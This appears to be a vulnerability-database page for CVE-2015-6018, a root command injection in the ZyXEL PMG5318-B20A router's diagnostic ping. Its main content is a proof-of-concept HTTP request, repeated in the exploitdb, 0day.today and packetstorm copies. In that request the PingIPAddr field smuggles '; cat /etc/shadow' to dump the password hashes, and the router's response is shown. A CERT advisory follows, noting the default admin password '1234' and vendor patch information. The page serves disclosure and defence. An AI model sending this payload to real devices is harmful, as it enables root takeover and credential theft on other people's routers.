Search...

ZYXEL PMG5318-B20A - OS Command Injection

2015-10-14T00:00:00

ID EXPLOITPACK:D55B8FC1E66F8F1A355D067C3AE470B2
Type exploitpack
Reporter Karn Ganeshen
Modified 2015-10-14T00:00:00

Description

ZYXEL PMG5318-B20A - OS Command Injection

                                        
                                            # Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]
# Discovered by: Karn Ganeshen
# CERT VU# 870744
# Vendor Homepage: [www.zyxel.com]
# Version Reported: [Firmware version V100AANC0b5]
# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]


*Vulnerability Details*

CWE-20 &lt;http://cwe.mitre.org/data/definitions/20.html&gt;: Improper Input
Validation - CVE-2015-6018

The diagnostic ping function's PingIPAddr parameter in the ZyXEL
PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user
input. An attacker can execute arbitrary commands as root.

*OS Command Injection PoC*

The underlying services are run as 'root'. It therefore, allows dumping
system password hashes.

*HTTP Request*

POST /diagnostic/diagnostic_general.cgi HTTP/1.1
Host: &lt;IP&gt;
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101
Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://&lt;IP&gt;/diagnostic/diagnostic_general.cgi
Cookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------
-12062103314079176991367286444
Content-Length: 451

——————————————12062103314079176991367286444
Content-Disposition: form-data; name="InfoDisplay”
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="*PingIPAddr*"
*8.8.8.8; cat /etc/shadow *
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="Submit"
Ping
….
*HTTP Response *
.....
&lt;snipped&gt;
&lt;br class="clearfloat" /&gt;
&lt;!-- configuration beginning --&gt;
&lt;div class="headline"&gt;&lt;span class="cTitle"&gt;General&lt;/span&gt;&lt;/div&gt; &lt;table
width="90%" border="0" align="center" cellpadding="0" cellspacing="0"
class="cfgpadding"&gt;
&lt;tr&gt;
&lt;td nowrap="nowrap"&gt;&lt;textarea name="InfoDisplay" rows="15" cols="100"
readonly="readonly”&gt;


*root:&lt;hash&gt;:15986:0:99999:7:::
lp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:&lt;hash&gt;:16035:0:99999:7:::
user:&lt;hash&gt;:16035:0:99999:7:::*
 &lt;/textarea&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;table width="90%" border="0" align="center" cellpadding="0"
cellspacing="0" class="cfgpadding"&gt;
&lt;tr&gt;
-----------------------------12062103314079176991367286444--

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:05:38", "references": [], "description": "\nZYXEL PMG5318-B20A - OS Command Injection", "edition": 1, "reporter": "Karn Ganeshen", "exploitpack": {"type": "webapps", "platform": "hardware"}, "published": "2015-10-14T00:00:00", "title": "ZYXEL PMG5318-B20A - OS Command Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-6018"]}, {"type": "zdt", "idList": ["1337DAY-ID-24426"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:133960"]}, {"type": "exploitdb", "idList": ["EDB-ID:38455"]}, {"type": "cert", "idList": ["VU:870744"]}], "modified": "2020-04-01T19:05:38", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-04-01T19:05:38", "rev": 2}, "vulnersScore": 6.9}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-6018"], "modified": "2015-10-14T00:00:00", "id": "EXPLOITPACK:D55B8FC1E66F8F1A355D067C3AE470B2", "href": "", "viewCount": 1, "sourceData": "# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]\n# Discovered by: Karn Ganeshen\n# CERT VU# 870744\n# Vendor Homepage: [www.zyxel.com]\n# Version Reported: [Firmware version V100AANC0b5]\n# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]\n\n\n*Vulnerability Details*\n\nCWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input\nValidation - CVE-2015-6018\n\nThe diagnostic ping function's PingIPAddr parameter in the ZyXEL\nPMG5318-B20A, firmware version V100AANC0b5, does not properly validate user\ninput. An attacker can execute arbitrary commands as root.\n\n*OS Command Injection PoC*\n\nThe underlying services are run as 'root'. It therefore, allows dumping\nsystem password hashes.\n\n*HTTP Request*\n\nPOST /diagnostic/diagnostic_general.cgi HTTP/1.1\nHost: <IP>\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101\nFirefox/40.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://<IP>/diagnostic/diagnostic_general.cgi\nCookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive\nContent-Type: multipart/form-data; boundary=--------------------------\n-12062103314079176991367286444\nContent-Length: 451\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\nContent-Disposition: form-data; name=\"InfoDisplay\u201d\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\nContent-Disposition: form-data; name=\"*PingIPAddr*\"\n*8.8.8.8; cat /etc/shadow *\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\nContent-Disposition: form-data; name=\"Submit\"\nPing\n\u2026.\n*HTTP Response *\n.....\n<snipped>\n<br class=\"clearfloat\" />\n\n<div class=\"headline\"><span class=\"cTitle\">General</span></div> <table\nwidth=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\"\nclass=\"cfgpadding\">\n<tr>\n<td nowrap=\"nowrap\"><textarea name=\"InfoDisplay\" rows=\"15\" cols=\"100\"\nreadonly=\"readonly\u201d>\n\n\n*root:<hash>:15986:0:99999:7:::\nlp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::\nuser:<hash>:16035:0:99999:7:::*\n </textarea></td>\n</tr>\n</table>\n<table width=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\"\ncellspacing=\"0\" class=\"cfgpadding\">\n<tr>\n-----------------------------12062103314079176991367286444--", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:21:27", "description": "The diagnostic-ping implementation on ZyXEL PMG5318-B20A devices with firmware before 1.00(AANC.2)C0 allows remote attackers to execute arbitrary commands via the PingIPAddr parameter.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-12-31T05:59:00", "title": "CVE-2015-6018", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6018"], "modified": "2017-09-15T01:29:00", "cpe": ["cpe:/o:zyxel:pmg5318-b20a_firmware:v100aanc0b5"], "id": "CVE-2015-6018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6018", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:zyxel:pmg5318-b20a_firmware:v100aanc0b5:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-03-02T01:39:01", "edition": 2, "description": "Exploit for hardware platform in category web applications", "published": "2015-10-14T00:00:00", "type": "zdt", "title": "ZyXEL PMG5318-B20A - OS Command Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-6018"], "modified": "2015-10-14T00:00:00", "id": "1337DAY-ID-24426", "href": "https://0day.today/exploit/description/24426", "sourceData": "# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]\r\n# Discovered by: Karn Ganeshen\r\n# CERT VU# 870744\r\n# Vendor Homepage: [www.zyxel.com]\r\n# Version Reported: [Firmware version V100AANC0b5]\r\n# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]\r\n \r\n \r\n*Vulnerability Details*\r\n \r\nCWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input\r\nValidation - CVE-2015-6018\r\n \r\nThe diagnostic ping function's PingIPAddr parameter in the ZyXEL\r\nPMG5318-B20A, firmware version V100AANC0b5, does not properly validate user\r\ninput. An attacker can execute arbitrary commands as root.\r\n \r\n*OS Command Injection PoC*\r\n \r\nThe underlying services are run as 'root'. It therefore, allows dumping\r\nsystem password hashes.\r\n \r\n*HTTP Request*\r\n \r\nPOST /diagnostic/diagnostic_general.cgi HTTP/1.1\r\nHost: <IP>\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101\r\nFirefox/40.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://<IP>/diagnostic/diagnostic_general.cgi\r\nCookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive\r\nContent-Type: multipart/form-data; boundary=--------------------------\r\n-12062103314079176991367286444\r\nContent-Length: 451\r\n \r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"InfoDisplay\u201d\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"*PingIPAddr*\"\r\n*8.8.8.8; cat /etc/shadow *\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"Submit\"\r\nPing\r\n\u2026.\r\n*HTTP Response *\r\n.....\r\n<snipped>\r\n<br class=\"clearfloat\" />\r\n\r\n<div class=\"headline\"><span class=\"cTitle\">General</span></div> <table\r\nwidth=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\"\r\nclass=\"cfgpadding\">\r\n<tr>\r\n<td nowrap=\"nowrap\"><textarea name=\"InfoDisplay\" rows=\"15\" cols=\"100\"\r\nreadonly=\"readonly\u201d>\r\n \r\n \r\n*root:<hash>:15986:0:99999:7:::\r\nlp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::\r\nuser:<hash>:16035:0:99999:7:::*\r\n </textarea></td>\r\n</tr>\r\n</table>\r\n<table width=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\"\r\ncellspacing=\"0\" class=\"cfgpadding\">\r\n<tr>\r\n-----------------------------12062103314079176991367286444--\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24426"}], "exploitdb": [{"lastseen": "2016-02-04T08:08:05", "description": "ZyXEL PMG5318-B20A - OS Command Injection Vulnerability. CVE-2015-6018. Webapps exploit for hardware platform", "published": "2015-10-14T00:00:00", "type": "exploitdb", "title": "ZyXEL PMG5318-B20A - OS Command Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-6018"], "modified": "2015-10-14T00:00:00", "id": "EDB-ID:38455", "href": "https://www.exploit-db.com/exploits/38455/", "sourceData": "# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]\r\n# Discovered by: Karn Ganeshen\r\n# CERT VU# 870744\r\n# Vendor Homepage: [www.zyxel.com]\r\n# Version Reported: [Firmware version V100AANC0b5]\r\n# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]\r\n\r\n\r\n*Vulnerability Details*\r\n\r\nCWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input\r\nValidation - CVE-2015-6018\r\n\r\nThe diagnostic ping function's PingIPAddr parameter in the ZyXEL\r\nPMG5318-B20A, firmware version V100AANC0b5, does not properly validate user\r\ninput. An attacker can execute arbitrary commands as root.\r\n\r\n*OS Command Injection PoC*\r\n\r\nThe underlying services are run as 'root'. It therefore, allows dumping\r\nsystem password hashes.\r\n\r\n*HTTP Request*\r\n\r\nPOST /diagnostic/diagnostic_general.cgi HTTP/1.1\r\nHost: <IP>\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101\r\nFirefox/40.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://<IP>/diagnostic/diagnostic_general.cgi\r\nCookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive\r\nContent-Type: multipart/form-data; boundary=--------------------------\r\n-12062103314079176991367286444\r\nContent-Length: 451\r\n\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"InfoDisplay\u201d\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"*PingIPAddr*\"\r\n*8.8.8.8; cat /etc/shadow *\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"Submit\"\r\nPing\r\n\u2026.\r\n*HTTP Response *\r\n.....\r\n<snipped>\r\n<br class=\"clearfloat\" />\r\n\r\n<div class=\"headline\"><span class=\"cTitle\">General</span></div> <table\r\nwidth=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\"\r\nclass=\"cfgpadding\">\r\n<tr>\r\n<td nowrap=\"nowrap\"><textarea name=\"InfoDisplay\" rows=\"15\" cols=\"100\"\r\nreadonly=\"readonly\u201d>\r\n\r\n\r\n*root:<hash>:15986:0:99999:7:::\r\nlp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::\r\nuser:<hash>:16035:0:99999:7:::*\r\n </textarea></td>\r\n</tr>\r\n</table>\r\n<table width=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\"\r\ncellspacing=\"0\" class=\"cfgpadding\">\r\n<tr>\r\n-----------------------------12062103314079176991367286444--", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/38455/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:16", "description": "", "published": "2015-10-14T00:00:00", "type": "packetstorm", "title": "ZyXEL PMG5318-B20A OS Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-6018"], "modified": "2015-10-14T00:00:00", "id": "PACKETSTORM:133960", "href": "https://packetstormsecurity.com/files/133960/ZyXEL-PMG5318-B20A-OS-Command-Injection.html", "sourceData": "`# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability] \n# Discovered by: Karn Ganeshen \n# CERT VU# 870744 \n# Vendor Homepage: [www.zyxel.com] \n# Version Reported: [Firmware version V100AANC0b5] \n# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018 \n] \n \n \n*Vulnerability Details* \n \nCWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input \nValidation - CVE-2015-6018 \n \nThe diagnostic ping function's PingIPAddr parameter in the ZyXEL \nPMG5318-B20A, firmware version V100AANC0b5, does not properly validate user \ninput. An attacker can execute arbitrary commands as root. \n \n*OS Command Injection PoC* \n \nThe underlying services are run as 'root'. It therefore, allows dumping \nsystem password hashes. \n \n*HTTP Request* \n \nPOST /diagnostic/diagnostic_general.cgi HTTP/1.1 \nHost: <IP> \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 \nFirefox/40.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://<IP>/diagnostic/diagnostic_general.cgi \nCookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive \nContent-Type: multipart/form-data; boundary=-------------------------- \n-12062103314079176991367286444 \nContent-Length: 451 \n \n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444 \nContent-Disposition: form-data; name=\"InfoDisplay\u201d \n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444 \nContent-Disposition: form-data; name=\"*PingIPAddr*\" \n*8.8.8.8; cat /etc/shadow * \n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444 \nContent-Disposition: form-data; name=\"Submit\" \nPing \n\u2026. \n*HTTP Response * \n..... \n<snipped> \n<br class=\"clearfloat\" /> \n \n<div class=\"headline\"><span class=\"cTitle\">General</span></div> <table \nwidth=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\" \nclass=\"cfgpadding\"> \n<tr> \n<td nowrap=\"nowrap\"><textarea name=\"InfoDisplay\" rows=\"15\" cols=\"100\" \nreadonly=\"readonly\u201d> \n \n \n*root:<hash>:15986:0:99999:7::: \nlp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7::: \nuser:<hash>:16035:0:99999:7:::* \n</textarea></td> \n</tr> \n</table> \n<table width=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" \ncellspacing=\"0\" class=\"cfgpadding\"> \n<tr> \n-----------------------------12062103314079176991367286444-- \n \n-- \nBest Regards, \nKarn Ganeshen \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133960/zyxelpmg5318-exec.txt"}], "cert": [{"lastseen": "2020-09-18T20:43:05", "bulletinFamily": "info", "cvelist": ["CVE-2015-6016", "CVE-2015-6017", "CVE-2015-6018", "CVE-2015-6019", "CVE-2015-6020"], "description": "### Overview \n\nSeveral models of ZyXEL routers are vulnerable to multiple issues, including weak default passwords, command injections due to improper input validation, and cross-site scripting.\n\n### Description \n\n[**CWE-255**](<http://cwe.mitre.org/data/definitions/255.html>)**: Credentials Management - **CVE-2015-6016\n\nAccording to the reporter, the following models contain the weak default password of \"1234\" for the `admin` account: \n\n\n * the ZyXEL P-660HW-T1 v2 with ZyNOS firmware version: V3.40(AXH.0) (dated 3/30/2007)\n * the ZyXEL PMG5318-B20A, firmware version V100AANC0b5\n * the ZyXEL NBG-418N\n \n[Many more models](<https://default-password.info/zyxel/>) have been reported to share this same password. \n \n[**CWE-80**](<http://cwe.mitre.org/data/definitions/80.html>)**: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)** \\- CVE-2015-6017 \n \nAccording to the reporter, a reflected cross site scripting vulnerability exists in the `LoginPassword` and `hiddenPassword` parameters of the `/Forms/rpAuth_1` page on the ZyXEL P-660HW-T1 v2 with ZyNOS firmware version: V3.40(AXH.0) (dated 3/30/2007). \n \n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation** \\- CVE-2015-6018 \n \nAccording to the reporter, the diagnostic ping function's `PingIPAddr` parameter in the ZyXEL PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user input. An attacker may be able to execute arbitrary commands as root. \n \n[**CWE-613**](<http://cwe.mitre.org/data/definitions/613.html>)**: Insufficient Session Expiration** \\- CVE-2015-6019 \n \nAccording to the reporter, the ZyXEL PMG5318-B20A, firmware version V100AANC0b5 does not properly expire the session when a user logs out of the management portal. The reporter has confirmed the session remains active for at least 1 hour after log off. An attacker may be able to utilize session information to gain access to the device even after the user has logged off. \n \n[**CWE-285**](<http://cwe.mitre.org/data/definitions/285.html>)**: Improper Authorization** \\- CVE-2015-6020 \n \nAccording to the reporter, the regular `user` account on the ZyXEL PMG5318-B20A, firmware version V100AANC0b5 has full administrative access, rather than restricted access. \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to modify system configuration. \n \n--- \n \n### Solution \n\n**Apply updates and other changes** \n \nZyXEL has previously addressed some issues, and will address the remaining issues in October 2015. \n \nZyXEL has provided the following summary of responses to these issues: \n \n![](https://kb.cert.org/static-bigvince-prod-kb-eb/vincepub/images/870744_0.jpg) \n \nZyXEL has also provided the following responses: \n \nFor CVE-2015-6016: \n \n_\"ZyXEL suggests users of all products change the default password upon initial log-in. This is critical to protecting your network by keeping any unauthorized users from gaining access via the default password. ZyXEL has included reminders for this practice on a majority of products. Changing the default password upon initial log-in is mandatory for the ZyXEL USG/ZyWALL, UAG, and LTE Series.\"_ \n \nFor CVE-2015-6017: \n \n_\"Model P660HW-T1 v2 (ZyNOS v3.40) was designated \"end-of-life\" on May 14, 2010. ZyXEL assigns a product an \"end-of-life\" status when there is a clear indication that the market has transitioned to its replacement. This replacement generally offers advanced technology and/or better economics._ \n \n_ZyXEL recommends users replace P660HW-T1 v2 with newer generations of DSL CPEs that better suit the network environment today. Or alternatively, as a good general security practice, ZyXEL suggests that users avoid visiting untrusted sites or clicking on unsolicited links. It is also recommended that users keep their browser, computer operating system, and security software current with the latest patches and updates.\"_ \n \nFor CVE-2015-6018: \n \n_\"This issue was patched via a firmware update in December 2014 (version v1.00(AANC.2)C0), which included feature enhancements, as well as bug and security fixes. ZyXEL recommends that users go to the _[_support site_](<http://www.zyxel.com/support/support_landing.shtml>)_ to obtain the latest update.\"_ \n \nFor CVE-2015-6019 and CVE-2015-6020: \n \nZyXEL has released firmware version `V1.00(AANC.3)b1` to address these issues in PMG5318-20A. \n \n--- \n \n### Vendor Information\n\n870744\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### ZyXEL __ Affected\n\nNotified: August 25, 2015 Updated: October 13, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nZyXEL has also provided the following responses:\n\nFor CVE-2015-6016: \n \n\"ZyXEL suggests users of all products change the default password upon initial log-in. This is critical to protecting your network by keeping any unauthorized users from gaining access via the default password. ZyXEL has included reminders for this practice on a majority of products. Changing the default password upon initial log-in is mandatory for the ZyXEL USG/ZyWALL, UAG, and LTE Series.\" \n \nFor CVE-2015-6017: \n \n\"Model P660HW-T1 v2 (ZyNOS v3.40) was designated \"end-of-life\" on May 14, 2010. ZyXEL assigns a product an \"end-of-life\" status when there is a clear indication that the market has transitioned to its replacement. This replacement generally offers advanced technology and/or better economics. \n \nZyXEL recommends users replace P660HW-T1 v2 with newer generations of DSL CPEs that better suit the network environment today. Or alternatively, as a good general security practice, ZyXEL suggests that users avoid visiting untrusted sites or clicking on unsolicited links. It is also recommended that users keep their browser, computer operating system, and security software current with the latest patches and updates.\" \n \nFor CVE-2015-6018: \n \n\"This issue was patched via a firmware update in December 2014 (version v1.00(AANC.2)C0), which included feature enhancements, as well as bug and security fixes. ZyXEL recommends that users go to the [support site](<http://www.zyxel.com/support/support_landing.shtml>) to obtain the latest update.\" \n \nFor CVE-2015-6019 and CVE-2015-6020: \n \n\"ZyXEL has identified the root causes and will release a patch for PMG5318-20A in October 2015 to solve the session expiration and authorization issues.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.3 | AV:A/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.1 | E:POC/RL:U/RC:UR \nEnvironmental | 5.3 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n<http://www.zyxel.com/support/support_landing.shtml>\n\n### Acknowledgements\n\nThanks to Joel Land for reporting the vulnerability in the NBG-418N. Thanks to Karn Ganeshen for reporting the remaining vulnerabilities to us.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6016](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6016>), [CVE-2015-6017](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6017>), [CVE-2015-6018](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6018>), [CVE-2015-6019](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6019>), [CVE-2015-6020](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6020>) \n---|--- \n**Date Public:** | 2015-10-13 \n**Date First Published:** | 2015-10-13 \n**Date Last Updated: ** | 2015-10-29 13:38 UTC \n**Document Revision: ** | 45 \n", "modified": "2015-10-29T13:38:00", "published": "2015-10-13T00:00:00", "id": "VU:870744", "href": "https://www.kb.cert.org/vuls/id/870744", "type": "cert", "title": "ZyXEL NBG-418N, PMG5318-B20A and P-660HW-T1 routers contain multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}